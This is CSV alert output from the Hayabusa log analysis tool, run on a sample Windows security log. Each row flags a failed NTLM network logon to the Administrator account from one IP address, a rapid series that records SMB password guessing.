2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 84g2gO0253Ut4O1O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DRkFX9WTAhBZ8jc8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WuoQAi4k3XZPaf4O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KjKMhCnbR0uFT0av  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1lfwqPB0AgTfIOt4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mJuG26pQzdjUQael  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GXwEziYTA3DkkFVq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CHr6dirvkT8B9ZVs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B5eSMLiF4BsfY3xN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 64ISDuFRhR6cFYVQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hcprXytyuBw380XY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BxfQWiSIhZYxwNjh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FcL982boDelzeyzK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NBAAjRdaR8U0tqt7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EmqUjcltAW6StHQJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 129Rp3HCmRVRXw3C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jpIIQP2oWEF51EBI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HREGh5ppEkLAuEob  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UVkpQvotEMfM8R0C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dm6uHEy5RJJBJ6FG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HPTyAkYjcIlko5lu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OjlRoo9Sot4Fx4Th  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XslY26kw2aBw19D8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1404fakprYeqGiNY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y2VfIjtBcXCRlOjp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LPztyX4J9NV8EldT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 07flrrzWgsVBYaN2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vgkqkC1VvznGxR6N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hMn6yDMLgLChJTL6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uSTokOJ31Tj0bLXv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TyRifC46GrNpTA4x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CvNaby30vAT9drAX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wkYSOQ2bD51a4U8l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rqdOquL9Ax01RPPU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nqCCiK5arcyRHha6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TpyTGZLkAb0w0kgW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wa2pXrZKxeZZYKAq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dK0N5KeBgCze1YWi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g4dHlwZjMzI5wU2s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GzF2ouP5KkRfsxnf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RSQxMrGlDiAOo6ri  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gL0rz3p1yG6RhfAT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyChoTSKgJeK6yqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tG4I11dwpBM9SM3l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B7foAZ5Y1igCbHap  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ATDXUljQwg8WvUVs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdmXaJqQMAG2g6Ao  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bjame5puT5CDeoIG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0FGGVVkckmdURVh6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j0Smqw4cA4wG2Q6m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KLWloOhUYEQlj6y6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Tuxuykh0j5afeTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aeXS6QwYhqJAOeuz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AqFSJCq5bmBW6dj1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DH1zyt1hxTgzajhW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rrZxcWjUX4OgYYIb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ExtkYXSJI8F41uvw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sLh1Q3RieOoukiCT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kNb2hZDxi4QrbQpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jCb1TMlFj2PjH2sA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rgF42C57Nx6F3HU3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KZfFH9geIrxVYowJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pWz1XeyxywR0o5gS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: og1kItEC6WhqXF37  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q0KhaJlD6tWwF2ky  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XUy0EKmjyD6ZYENA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h3MdGstPPFJDGzwG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VTs0ZQa6LGrKZKsY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FefzWjMXSvMdvqcw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlnUt9tPRSXR5mWs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dehb4M6pcxi56Bkl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tLXHvGiUqZyxax4W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bP1gKcf1eeKm0RB1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
